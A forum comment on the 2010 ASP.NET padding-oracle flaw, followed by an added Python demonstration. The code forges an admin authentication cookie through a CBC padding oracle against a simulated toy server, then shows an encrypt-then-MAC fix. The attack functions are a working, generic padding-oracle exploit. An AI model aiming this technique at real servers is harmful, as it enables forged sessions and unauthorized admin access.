by storm 5750 days ago
Reporting on this story has so far been pretty crap, and light on details; hopefully a clearer picture will develop after ekoparty. But this is a serious issue. See http://visualstudiomagazine.com/articles/2010/09/14/aspnet-s.... The machine key can be determined if you're using AES (the default). And the machine key can be used to forge forms auth cookies.

It's not about figuring out what's in the client cookies - it's about forging cookies that the server completely trusts on account of the (broken) encryption.
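As an added worked example of the point in the comment above (this is not code from the comment, from ASP.NET or from the ekoparty talk): a CBC padding-oracle attack that forges a cookie the server decrypts and trusts, without the attacker ever learning the key. The block cipher is a toy Feistel construction standing in for AES, the server functions, cookie layout and oracle are assumptions, and the two `*_authenticated` functions show the encrypt-then-MAC check that closes the oracle.

```python
"""Forging a CBC-encrypted cookie through a padding oracle, with no key knowledge."""
import hashlib
import hmac
import os

BLOCK = 16

# Toy 4-round Feistel cipher keyed via SHA-256 (assumption, stands in for AES:
# the attack below only relies on CBC mode + PKCS#7 padding, not on the cipher).
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(key, i, r)))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _f(key, i, l))), l
    return l + r

def pad(b):
    n = BLOCK - len(b) % BLOCK
    return b + bytes([n]) * n

def unpad(b):
    n = b[-1]
    if not 1 <= n <= BLOCK or b[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return b[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(block_decrypt(key, blk), prev))
        prev = blk
    return out

# --- the (assumed) server side: the "machine key" the attacker never sees ---
SERVER_KEY = os.urandom(32)
MAC_KEY = os.urandom(32)

def issue_cookie(claims: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(SERVER_KEY, iv, pad(claims))   # cookie = IV || C1..Cn

def read_cookie(token: bytes) -> bytes:
    """Vulnerable server: decrypt, then trust whatever comes out."""
    return unpad(cbc_decrypt(SERVER_KEY, token[:BLOCK], token[BLOCK:]))

def padding_oracle(token: bytes) -> bool:
    """The leak: bad padding is distinguishable (error page, timing, status code)."""
    try:
        read_cookie(token)
        return True
    except ValueError:
        return False

# --- the attacker side: only the oracle, never the key ---
def recover_intermediate(oracle, blk):
    """Recover D(blk), the pre-XOR decryption of one block, byte by byte."""
    inter = bytearray(BLOCK)
    for p in range(1, BLOCK + 1):              # padding value we steer towards
        pos = BLOCK - p
        prefix = bytearray(BLOCK)              # used as the IV in front of blk
        for j in range(pos + 1, BLOCK):
            prefix[j] = inter[j] ^ p           # already-known bytes decrypt to p
        for guess in range(256):
            prefix[pos] = guess
            if not oracle(bytes(prefix) + blk):
                continue
            if p == 1 and pos > 0:             # rule out \x02\x02-style false hits
                alt = bytearray(prefix)
                alt[pos - 1] ^= 0xFF
                if not oracle(bytes(alt) + blk):
                    continue
            inter[pos] = guess ^ p
            break
        else:
            raise RuntimeError("oracle never accepted; not a padding oracle?")
    return bytes(inter)

def forge_cookie(oracle, claims: bytes) -> bytes:
    """Build IV || C1..Cn that decrypts to `claims` under the server's unknown key."""
    pt = pad(claims)
    blocks = [pt[i:i + BLOCK] for i in range(0, len(pt), BLOCK)]
    nxt = os.urandom(BLOCK)                    # last ciphertext block: anything
    ct = [nxt]
    for p in reversed(blocks):                 # walk backwards to the IV
        inter = recover_intermediate(oracle, nxt)
        nxt = bytes(a ^ b for a, b in zip(inter, p))   # previous block, or IV
        ct.insert(0, nxt)
    return b"".join(ct)

# --- hardened server: authenticate before decrypting, so no oracle exists ---
def issue_cookie_authenticated(claims: bytes) -> bytes:
    token = issue_cookie(claims)
    return token + hmac.new(MAC_KEY, token, "sha256").digest()

def read_cookie_authenticated(token: bytes) -> bytes:
    body, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(MAC_KEY, body, "sha256").digest(), tag):
        raise ValueError("bad MAC")            # rejected before any decryption
    return read_cookie(body)

def rejected_by_hardened_server(token: bytes) -> bool:
    try:
        read_cookie_authenticated(token)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    forged = forge_cookie(padding_oracle, b"user=admin;role=admin")
    print(read_cookie(forged))                 # the server "trusts" this
    print(rejected_by_hardened_server(forged + bytes(32)))
```

`forge_cookie` needs roughly 128 oracle queries per byte on average and never touches `SERVER_KEY`; the server's own `read_cookie` then returns the attacker-chosen claims. With the MAC checked first (and compared in constant time), a tampered or forged token is rejected before decryption, so there is nothing left for the attacker to probe.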